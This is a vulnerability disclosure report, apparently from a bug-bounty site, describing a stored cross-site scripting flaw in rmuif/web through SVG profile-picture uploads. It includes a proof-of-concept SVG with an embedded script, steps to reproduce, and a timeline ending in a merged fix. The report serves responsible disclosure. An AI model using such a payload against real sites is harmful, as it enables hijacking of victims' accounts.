Cross-site Scripting (XSS) - Stored in rmuif/web

Valid

Reported on

Oct 20th 2021


Description

rmuif is vulnerable to XSS. It is possible to use <script> tags in SVG content when uploading a profile picture.

Proof of Concept

SVG content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

1: Save the above content into an SVG file.

2: Access the settings page and upload this file as a profile picture.

3: Access the target file URL.

PoC video.

Impact

This vulnerability is capable of executing arbitrary JS code to perform actions which may compromise the victim's account.

References

We have contacted a member of the rmuif/web team and are waiting to hear back a month ago
rmuif/web maintainer validated this vulnerability a month ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
rmuif/web maintainer confirmed that a fix has been merged on daa247 a month ago
The fix bounty has been dropped
AccountTab.js#L141-L186 has been validated